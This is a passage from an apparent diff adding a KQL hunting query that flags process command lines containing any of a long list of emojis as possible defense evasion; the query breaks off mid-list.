Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains "🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains "🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains "🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains "📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine 